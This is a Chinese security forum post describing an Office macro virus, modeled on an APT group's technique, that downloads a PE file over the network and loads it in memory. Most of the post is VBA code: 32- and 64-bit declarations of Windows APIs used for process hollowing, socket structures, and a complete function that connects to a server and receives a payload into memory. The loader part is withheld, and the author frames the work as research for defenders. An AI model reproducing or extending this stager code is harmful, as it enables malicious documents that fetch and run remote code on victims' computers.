首页
论坛
课程
招聘
一个远程下载并内存加载PE的office宏病毒
2021-5-23 17:45 7242

一个远程下载并内存加载PE的office宏病毒

2021-5-23 17:45
7242

1.引言

    这份代码写于2019年初,当时一个名为海莲花的apt组织使用office宏加载shellcode,用shellcode内存加载病毒,并使用白加黑的方式加载恶意dll,在看着分析报告完整的复现了他的攻击手法后,我想再多做一些尝试。他的代码中shellcode与PE文件都是从本地解密得到的,我在此基础上增加了网络下载PE文件到内存,直接用office宏内存加载PE,并兼容了32位和64位系统。
    鉴于论坛坛主说此类项目不宜直接分享源代码,这里只讲一下下载部分的函数与结构体定义,感兴趣的朋友可以根据本贴自己实现。项目旨在研究office恶意宏的更多可行性,以便蓝队更好的做防御,切勿用于非法用途。

2.需求分析与初步设计

  2.1 网络下载
  使用宏调用ws2_32.dll的导出函数
  2.2 内存加载
  使用宏调用kernel32.dll的导出函数
  2.3 兼容32位与64位
  需要对所有函数与结构体做两份声明与定义

3.部分实现

    首先需要对所需的函数进行声明,对结构体进行定义,我在这里花费了很长时间,对所有函数的声明如下,其中包含了32位与64位:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#If Win64 Then
    Public Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long
    Public Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal socket As LongLong, ByVal SOCKADDR As LongLong, ByVal namelen As Long) As Long
    Public Declare PtrSafe Sub WSACleanup Lib "ws2_32.dll" ()
    Private Declare PtrSafe Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As LongLong, lpResult As LongLong) As Long
    Public Declare PtrSafe Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long
    Public Declare PtrSafe Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long
    Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
    Public Declare PtrSafe Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
    Public Declare PtrSafe Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
    Public Declare PtrSafe Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long
    Private Declare PtrSafe Function WSAGetLastError Lib "ws2_32.dll" () As Long
 
    Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
    Private Declare PtrSafe Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
    Private Declare PtrSafe Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Declare PtrSafe Function GetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
    Private Declare PtrSafe Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
    Private Declare PtrSafe Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
    Private Declare PtrSafe Function SetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
    Private Declare PtrSafe Function ResumeThread Lib "kernel32" (ByVal hThread As LongPtr) As Long
    Private Declare PtrSafe Function TerminateProcess Lib "kernel32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
 
    Public Declare PtrSafe Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As LongPtr, ByVal imageAddress As LongPtr) As Long
    Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#Else
    Public Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long
    Public Declare Function connect Lib "ws2_32.dll" (ByVal socket As Long, ByVal SOCKADDR As Long, ByVal namelen As Long) As Long
    Public Declare Sub WSACleanup Lib "ws2_32.dll" ()
    Private Declare Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As Long, lpResult As Long) As Long
    Public Declare Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long
    Public Declare Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long
    Private Declare Function CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) As Long
    Public Declare Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
    Public Declare Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
    Public Declare Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long
    Private Declare Function WSAGetLastError Lib "ws2_32.dll" () As Long
    Private Declare Function VarPtrArray Lib "VBE7" Alias "VarPtr" (var() As Any) As Long
    Private Declare Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)
    Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
    Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Declare Function GetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
    Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
    Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
    Private Declare Function SetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
    Private Declare Function ResumeThread Lib "kernel32" (ByVal hThread As Long) As Long
    Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long
    Public Declare Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As Long, ByVal imageAddress As Long) As Long
    Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If

    有了以上定义的函数,还需要定义一些结构体,其中包括socket通信需要用到的结构体与PE文件结构需要用到的结构体
socket通信结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#If Win64 Then
    Private Type WSADATA
        wVersion As Integer
        wHighVersion As Integer
        szDescription(0 To WSADESCRIPTION_LEN) As Byte
        szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte
        iMaxSockets As Integer
        iMaxUdpDg As Integer
        lpVendorInfo As LongLong
    End Type
    Private Type ADDRINFO
        ai_flags As Long
        ai_family As Long
        ai_socktype As Long
        ai_protocol As Long
        ai_addrlen As Long
        ai_canonName As LongLong 'strptr
        ai_addr As LongLong 'p sockaddr
        ai_next As LongLong 'p addrinfo
    End Type
#Else
    Private Type WSADATA
        wVersion As Integer
        wHighVersion As Integer
        szDescription(0 To WSADESCRIPTION_LEN) As Byte
        szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte
        iMaxSockets As Integer
        iMaxUdpDg As Integer
        lpVendorInfo As Long
    End Type
    Private Type ADDRINFO
        ai_flags As Long
        ai_family As Long
        ai_socktype As Long
        ai_protocol As Long
        ai_addrlen As Long
        ai_canonName As Long 'strptr
        ai_addr As Long 'p sockaddr
        ai_next As Long 'p addrinfo
    End Type
#End If

一些需要用到的枚举量:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Enum AF
    AF_UNSPEC = 0
    AF_INET = 2
    AF_IPX = 6
    AF_APPLETALK = 16
    AF_NETBIOS = 17
    AF_INET6 = 23
    AF_IRDA = 26
    AF_BTH = 32
End Enum
 
Enum sock_type
    SOCK_STREAM = 1
    SOCK_DGRAM = 2
    SOCK_RAW = 3
    SOCK_RDM = 4
    SOCK_SEQPACKET = 5
End Enum

    PE文件结构体太多了就不写了,按照上面的那种格式与类型写就可以。

 

    下载函数如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
Function GetCode()
    Dim m_wsaData As WSADATA
    Dim m_RetVal As Integer
    Dim m_Hints As ADDRINFO
    Dim m_ConnSocket As Long: m_ConnSocket = INVALID_SOCKET
    Dim Server As String
    Dim port As String
    #If Win64 Then
        Dim pAddrInfo As LongLong
    #Else
        Dim pAddrInfo As Long
    #End If
    Dim RetVal As Long
    Dim lastError As Long
    RetVal = WSAStartup(MAKEWORD(2, 2), m_wsaData)
    If (RetVal <> 0) Then
        LogError "WSAStartup failed with error " & RetVal, WSAGetLastError()
        Call WSACleanup
        Exit Function
    End If
    m_Hints.ai_family = AF.AF_UNSPEC
    m_Hints.ai_socktype = sock_type.SOCK_STREAM
    Server = "127.0.0.1"
    port = "9593"
    RetVal = GetAddrInfo(Server, port, VarPtr(m_Hints), pAddrInfo)
    If (RetVal <> 0) Then
        LogError "Cannot resolve address " & Server & " and port " & port & ", error " & RetVal, WSAGetLastError()
        Call WSACleanup
        Exit Function
    End If
    m_Hints.ai_next = pAddrInfo
    Dim connected As Boolean: connected = False
    Do While m_Hints.ai_next > 0
    'Do While 1
        CopyMemory m_Hints, ByVal m_Hints.ai_next, LenB(m_Hints)
        m_ConnSocket = ws_socket(m_Hints.ai_family, m_Hints.ai_socktype, m_Hints.ai_protocol)
        If (m_ConnSocket = INVALID_SOCKET) Then
            LogError "Error opening socket, error " & RetVal
        Else
            Dim connectionResult As Long
            connectionResult = connect(m_ConnSocket, m_Hints.ai_addr, m_Hints.ai_addrlen)
            If connectionResult <> SOCKET_ERROR Then
                connected = True
                Exit Do
            End If
            LogError "connect() to socket failed"
            closesocket (m_ConnSocket)
        End If
    Loop
    If Not connected Then
        LogError "Fatal error: unable to connect to the server", WSAGetLastError()
        Call WSACleanup
        Exit Function
    End If
    'Dim SendBuf() As Byte
    'SendBuf = StrConv("Message #1", vbNarrow)
    '发送
    Dim dataBuf As Variant
    dataBuf = Array(32, 42, 42, 5, 6)
    Dim dataLen As Integer: dataLen = UBound(dataBuf) - LBound(dataBuf) + 1
    Dim sendBuf() As Byte
    ReDim sendBuf(dataLen)
    '打印发送的数据
    Dim i As Long
    For i = 0 To dataLen - 1
        sendBuf(i) = dataBuf(i)
        Debug.Print sendBuf(i);
    Next i
    RetVal = Send(m_ConnSocket, sendBuf(0), dataLen, 0)
    If RetVal = SOCKET_ERROR Then
        LogError "send() failed", WSAGetLastError()
        Call WSACleanup
        Exit Function
    Else
        Debug.Print "sent " & RetVal & " bytes"
    End If
    '接收
    Dim payloadBuf() As Byte
    Dim recvBuf() As Byte
    Dim recvSize As Integer: recvSize = 32
    ReDim recvBuf(recvSize)
    Dim recvLen As Integer: recvLen = 0
    Dim index As Long: index = 0
    Do While 1
        recvLen = Recv(m_ConnSocket, recvBuf(0), recvSize, 0)
        'For i = 0 To recvLen - 1
        '   Debug.Print recvBuf(i);
        'Next i
        'Debug.Print
        If recvLen > 0 Then
            ReDim Preserve payloadBuf(index + recvLen)
            Call CopyMemory(ByVal VarPtr(payloadBuf(index)), ByVal VarPtr(recvBuf(0)), recvLen)
            index = index + recvLen
        Else
            Exit Do
        End If
    Loop
    '打印接收到的数据
    Debug.Print "接收到的长度为:";
    Debug.Print UBound(payloadBuf) - LBound(payloadBuf)
    'Debug.Print "接收到的数据为:";
    'For i = 0 To index - 1
    '    Debug.Print payloadBuf(i);  '打印的时候加<;>则不换行
    'Next i
    'Debug.Print
    RetVal = closesocket(m_ConnSocket)
    If RetVal <> 0 Then
    LogError "closesocket() failed", WSAGetLastError()
    Call WSACleanup
    Else
        Debug.Print "closed socket"
    End If
    GetCode = payloadBuf
End Function

    以上便是下载部分的大概思路与代码,内存加载部分感兴趣可以自己实现一下,难度主要在结构体的定义部分。

4.结语

    office宏编程逻辑上与Windows编程相同,难点在于结构体的定义与API的声明,尤其是PE文件的结构体,按照上面的示例,花点时间就可以实现内存加载,难度不大,就是麻烦。


恭喜ID[飞翔的猫咪]获看雪安卓应用安全能力认证高级安全工程师!!

收藏
点赞3
打赏
分享
最新回复 (2)
雪    币: 16
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
mJqalJqN 活跃值 2021-5-24 23:56
2
0
样本呢?
雪    币: 311
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
mb_othzuqqm 活跃值 2021-5-25 13:38
3
0
牛批666我嘞宝贝
游客
登录 | 注册 方可回帖
返回